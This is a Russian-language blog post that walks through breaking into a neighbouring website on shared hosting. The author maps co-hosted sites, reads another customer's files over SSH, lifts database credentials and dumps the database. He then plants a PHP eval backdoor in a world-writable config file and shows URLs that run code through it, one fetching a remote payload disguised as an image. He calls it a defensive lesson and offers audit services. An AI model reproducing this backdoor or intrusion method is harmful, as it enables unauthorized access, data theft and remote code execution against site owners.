После того, как я коснулся вопросов защиты и взлома непосредственно своими руками – так сказать изнутри процесса – решил не останавливаться на достигнутом, т.к. тема меня сильно заинтересовала.

В прошлой статье  Защита сайта от взлома я затронул только один из методов (которым сам и воспользовался) – это SQL иньекция. Сегодня решил “пощупать” с другой стороны. (кстати мои советы упомянутые в прошлой статье – ой как оказались полезными бы при защите сайта сегодняшнего поста).

Данная статья ИМХО будет интересна всем тем, кто берёт хостинг с соседями – т.е. всем кто покупает обычный хостинг на серваках,  а не сервак целеком (как с виртуальными серверами дела обстоят – не знаю).

Лично я после всех своих экспериментов выдохнул с облегчением – “как же хорошо что у меня дедик !”.

На этот раз буду краток и сухо приведу сам эксперимент по взлому:

1.  На одном из своих хостингов посмотрел структуру папок /www/mysite/www/htdocs/  (я посмотрел через выдачу phpinfo() – хотя способов думаю туча, вроде даже в инициализационном письме от хостера это прописано )

2. Простым ping запросом определяю реальный IP сервака ping mysite.ru  XX.XX.XX.XX

3. На сайте 2ip.ru определяю “соседей” – сайты на определенном IP (айпишник с п.2) – оказалось 190 соседей !!!

4. Беру за цель первого же соседа – сайт site.ru  (реальные названия сайтов и всех данных я решил изменить 🙂 т.к. ломаю не с целю наживы – а с целью прочувствовать как нужно защищать)

5. Захожу ssh к себе на хостинг и конечно же ожидая облом пробую сd /www/site/www/htdocs/ – !!!! и к величайшему своему удивлению попадаю по месту назначения !

6. Далее пробегаюсь по php, inc  и подобным – сразу же вытаскиваю доступ к БД – имя, юзер, пасс. – выгружаю дампером БД к себе (просто так – на всякий случай – ещё не смотрел даже чё там).

7. Прав на создание, модификацию конечно же не имею, поэтому бегаю по всей структуре в поисках заведомых 777 или 666 с “правильным” овнером.  Толи мне так фортануло, толи действительно всё так запущено – проблем с поиском такого файла у меня не возникло. Оказался конфигурационный файл – причем подключаемый из php доступного уже с браузера.

8. ВСЁ !  дописываем в него if (isset($_REQUEST[“e”])) eval(stripslashes($_REQUEST[“e”]));  и это в принципе финальная точка

в проверяем http://site.ru/file.php?e=phpinfo();

ну и как логическое завершение
http://site.ru/file.php?e=eval(file_get_contents(‘http://бла бла бла.ru/page.jpg’));
где page.jpg конечно же не картинка 😉

морда ломаемого сайта PR 3,  ТИЦ 550 наличие в каталогах Яндекс, Рамблер, Апорт, Дмоз, более 1к страниц в Гугле, более 5к страниц в Яше

и чё с тобой делать то ? ….

мля – даже страшно такие сайты ломать … 😉

Вот сижу и думаю – ваяешь, продвигаешь, развиваешь – в общем въёбываешь по полной чтоб таких показателей добиться – а тут хуякс и готово. И остаётся только надеяться на порядочность хакера и на своевременность бэкапов.

Почти как в рекламе получилось “Вы достаточно защитили свой сайт ? Вы сделали полный бэкап файлов и БД ? нет ?! тогда я иду к Вам!” 🙂

И ещё не добро так рифмуется “В нашем серве поселился замечательный сосед“.

Статья как Вы надеюсь поняли сделана не для взлома, а исключительно чтобы Вы поняли от чего и как нужно защищаться.

Возможно будет ещё статейка в продолжение, т.к. например не раскрыта тема каким образом упускаются пароли от FTP (сам на пробу с год назад покупал доступ от взломанного сайта – тогда мне  был предоставлен FTP доступ).

На сей раз всё описанное в статье придумал и реализовал сам, так что “полезных” ссылок в данном материале не будет.

P.S.

Я всё так же предлагаю свои услуги по аудиту информационной безопасности Вашего сайта.